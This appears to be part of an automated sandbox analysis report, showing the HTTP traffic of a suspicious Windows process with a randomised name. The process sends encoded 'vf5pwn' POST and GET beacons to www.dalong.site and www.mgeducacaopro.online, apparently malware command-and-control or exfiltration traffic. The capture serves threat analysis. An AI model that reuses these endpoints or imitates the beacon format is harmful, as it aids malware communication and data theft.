                                              Sep 26, 2024 15:22:54.511765003 CEST766OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 71 4f 75 47 63 6e 53 55 2b 42 62 64 32 68 31 4f 58 4f 4d 55 65 49 43 33 52 69 38 6c 38 75 53 52 34 41 45 39 45 44 5a 54 63 77 4e 42 53 50 70 61 6c 7a 54 59 70 6c 41 7a 4c 4d 38 2f 32 7a 4e 75 67 45 66 78 58 68 41 55 34 4e 79 4e 49 70 35 58 77 6a 4e 6e 6c 59 7a 59 37 2f 58 6b 50 42 76 79 2f 69 63 4d 6b 54 6c 71 64 57 77 76 4c 6a 6f 41 71 56 34 59 51 4c 44 48 57 6b 4e 4c 2b 6b 52 52 51 4d 4b 35 77 73 34 6b 61 4b 6b 48 75 54 41 49 39 79 6c 6e 54 7a 67 2b 68 52 47 46 50 6b 53 79 51 4e 38 6c 6e 33 72 46 46 38 30 49 78 51 45 6e 32 52 47 45 78 34 32 70 44 2b 77 3d
                                              Data Ascii: vf5pwn=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTzg+hRGFPkSyQN8ln3rFF80IxQEn2RGEx42pD+w=
                                              Sep 26, 2024 15:22:54.968684912 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:22:54 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549716172.96.187.60802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:57.069202900 CEST786OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 4b 52 34 68 30 39 4b 68 78 54 53 51 4e 42 61 76 70 56 34 44 53 57 70 6c 64 4d 4c 4f 6f 2f 32 31 68 75 67 42 62 78 58 57 30 56 36 64 79 44 51 5a 35 47 2b 44 4e 6e 6c 59 7a 59 37 37 2b 42 50 42 33 79 2b 54 73 4d 6c 32 52 74 51 32 77 73 49 6a 6f 41 38 56 34 69 51 4c 43 69 57 68 73 51 2b 6d 5a 52 51 4f 53 35 33 39 34 6e 55 4b 6b 42 67 7a 42 41 78 42 46 72 55 56 38 32 6d 42 4c 6a 54 55 43 57 56 37 52 50 39 56 6a 74 57 63 59 77 68 44 4d 51 6e 68 6e 74 72 62 6d 5a 64 70 6c 73 49 36 51 4a 48 39 4b 6d 52 46 45 55 56 6b 6d 6f 6a 4c 50 37
                                              Data Ascii: vf5pwn=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcYwhDMQnhntrbmZdplsI6QJH9KmRFEUVkmojLP7
                                              Sep 26, 2024 15:22:57.503612995 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:22:57 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.549717172.96.187.60802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:22:59.623418093 CEST1803OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 79 52 34 33 6f 39 46 67 78 54 54 51 4e 42 55 50 70 46 34 44 53 62 70 6c 46 49 4c 4f 6b 4a 32 77 39 75 78 58 6e 78 65 43 6f 56 7a 64 79 44 4d 70 34 42 77 6a 4e 2b 6c 59 6a 63 37 2f 61 42 50 42 33 79 2b 52 30 4d 73 44 6c 74 44 6d 77 76 4c 6a 6f 4d 71 56 35 4e 51 4c 71 55 57 68 67 41 35 56 68 52 65 4f 43 35 31 50 51 6e 63 4b 6b 44 6a 7a 41 47 78 42 49 31 55 52 63 51 6d 42 2b 45 54 57 69 57 56 2b 31 57 6b 6b 6e 6c 4c 39 51 64 6b 41 34 71 78 42 6a 75 71 4a 2b 58 64 71 56 68 44 61 30 5a 46 4b 47 68 48 68 56 77 4d 67 69 6b 72 4f 2b 45 62 46 79 6f 73 49 75 65 68 78 48 4b 6a 6e 67 4f 73 5a 55 62 76 2b 56 2f 47 75 34 34 49 73 54 49 4b 75 72 48 6c 4b 54 37 62 43 61 56 79 5a 50 56 71 45 54 6c 6c 68 53 2b 65 41 59 69 34 33 56 47 6f 71 4c 42 70 36 6e 65 36 52 42 50 52 37 33 72 34 6b 47 53 58 58 38 55 53 52 66 79 76 30 7a 57 64 54 51 42 47 30 79 72 47 6d 57 38 48 4c 62 [TRUNCATED]
                                              Data Ascii: vf5pwn=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YyR43o9FgxTTQNBUPpF4DSbplFILOkJ2w9uxXnxeCoVzdyDMp4BwjN+lYjc7/aBPB3y+R0MsDltDmwvLjoMqV5NQLqUWhgA5VhReOC51PQncKkDjzAGxBI1URcQmB+ETWiWV+1WkknlL9QdkA4qxBjuqJ+XdqVhDa0ZFKGhHhVwMgikrO+EbFyosIuehxHKjngOsZUbv+V/Gu44IsTIKurHlKT7bCaVyZPVqETllhS+eAYi43VGoqLBp6ne6RBPR73r4kGSXX8USRfyv0zWdTQBG0yrGmW8HLbdTou2t/+Tgmm9rO3ZVVssqVoZQ4iL0THL3bYYtUIGAZ6vxvG0bQxxpDEmAn/PJI8x8wz4zU94oF+Rqn6mV1Y4aMq34RgcpnHxY6Awv6utC4s9K5chyAsFTKNSLg5thRj+Azc0sG1bmhA6B0uKtOFV+kkFztwP/FuBQ+Jk9846sVhViyb7S2r15FbL0+AqqkORKOoM26Png9/NPyP5mmt81FjlCXklkD6IrtWW++gCoe2PgTYAbSel179FPyLePNhp3Nrztv63lKR7E8hyC7/YIFjxSW16Mg7IA9zAjxZJyLnsXZcwzNHEwtMKKhcpFLmjK5FSK+KNoiQqwuW4Nne4sSlC1dGlvES0bWfMi0nz/eOUk6J1X6JotqZj8ZY8Z24V/Y67A0I3RVfkl96XT0dooXiolo2fBLAJOx/WdA8XbiGoO84KXt42yiWg7mXMidUazRMREqWhM0PCPGGkOltS85Bsu8JmXsN+A7gsjUF4yqcHQPZfuFuvtS5SaYWEKumq9VK3G8NLPP9hH0SHVPRBb2gnaLtiqJhse93j1Vrjb5kkrA8/ELR3agVkOwbaKHcRZmOAGnuxuFsKF77kFCmXfn1AAjOfFQtg+R//V3Q9bGIhAekgJxNNldEVGWOrgQDA+vO2oUXGP2dXQ31nmFzdmvuARV9LGb9LV [TRUNCATED]
                                              Sep 26, 2024 15:23:00.059273958 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:23:00 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.549718172.96.187.60802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:02.183551073 CEST522OUTGET /v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dalong.site
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:23:02.624314070 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:23:02 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.5497193.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:07.737963915 CEST793OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 56 35 70 35 44 62 36 4d 32 32 39 48 4c 39 57 37 52 53 66 2b 41 66 69 74 38 66 51 73 6e 72 7a 77 56 33 64 4c 32 30 74 42 49 6f 4a 6b 34 6b 38 6d 75 73 4b 53 56 39 6f 79 74 78 6f 53 4e 62 53 53 6d 71 7a 73 6e 47 71 34 76 6d 46 36 52 33 41 38 30 49 2b 77 57 58 55 67 78 64 49 6f 51 4a 36 57 56 56 6c 34 61 30 77 35 42 68 49 66 6f 54 34 7a 4f 46 4e 71 36 66 63 2b 42 4f 54 74 76 63 76 77 39 4c 47 4c 2b 55 45 58 49 33 66 59 6d 79 62 42 54 65 59 45 38 61 65 52 4e 67 55 42 7a 2b 30 59 5a 33 75 64 58 4e 38 68 7a 7a 42 6b 6f 31 2f 47 54 45 6b 6f 2b 2f 73 74 78 43 55 3d
                                              Data Ascii: vf5pwn=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE8aeRNgUBz+0YZ3udXN8hzzBko1/GTEko+/stxCU=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.5497203.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:10.471750975 CEST813OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 66 66 77 55 56 46 4c 33 77 35 42 4a 6f 4a 6b 74 55 38 6e 7a 63 4b 6e 56 39 6b 4d 74 30 51 53 4e 59 75 53 6d 72 44 73 6e 56 43 37 67 57 46 6b 65 58 41 36 35 6f 2b 77 57 58 55 67 78 64 64 67 51 4a 43 57 56 6c 56 34 4c 6c 77 2b 61 42 49 63 2f 6a 34 7a 4b 46 4e 78 36 66 63 59 42 50 50 48 76 65 6e 77 39 4c 57 4c 2b 41 59 55 47 33 66 53 72 53 61 44 62 4e 6c 6a 38 71 65 52 46 43 59 42 77 39 67 4d 52 68 44 33 4e 76 30 4a 67 54 74 63 34 6d 33 78 43 30 46 42 6b 63 38 64 76 56 42 52 78 57 6c 32 52 46 4a 61 5a 75 44 51 75 49 49 72 58 36 4f 52
                                              Data Ascii: vf5pwn=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTtc4m3xC0FBkc8dvVBRxWl2RFJaZuDQuIIrX6OR


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.5497213.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:13.021862030 CEST1830OUTPOST /xamn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mgeducacaopro.online
                                              Origin: http://www.mgeducacaopro.online
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mgeducacaopro.online/xamn/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 65 4c 77 56 67 5a 4c 32 58 46 42 62 59 4a 6b 73 55 38 36 7a 63 4b 36 56 39 73 41 74 30 4d 73 4e 64 71 53 6e 49 62 73 32 30 43 37 37 6d 46 6b 63 58 41 2f 30 49 2b 6c 57 58 6b 6b 78 64 4e 67 51 4a 43 57 56 6e 4e 34 62 45 77 2b 64 78 49 66 6f 54 34 42 4f 46 4d 2f 36 66 46 6a 42 50 62 39 76 50 48 77 38 76 4b 4c 38 7a 77 55 4b 33 66 63 34 69 61 68 62 4e 70 38 38 71 43 6e 46 48 6c 6b 77 39 49 4d 52 6c 32 36 5a 4d 49 70 79 41 35 51 32 58 7a 54 59 6a 74 69 75 76 38 35 74 33 5a 65 35 31 39 35 54 69 52 4f 4d 74 43 62 31 2b 73 46 58 71 76 5a 51 36 46 47 31 61 66 63 79 38 56 6e 45 64 4e 46 6f 77 53 55 6a 6a 71 51 71 6a 4b 75 55 61 6a 75 57 4a 42 45 55 41 4a 44 4c 6b 48 78 43 4e 77 68 45 4a 30 69 69 2b 6c 64 46 62 52 64 47 51 42 6c 58 37 30 65 47 46 57 71 37 63 6a 7a 6a 34 41 30 38 2f 7a 57 44 49 33 41 56 2f 71 35 33 55 69 63 34 2b 4c 49 54 43 4b 65 65 59 51 32 53 52 4d [TRUNCATED]
                                              Data Ascii: 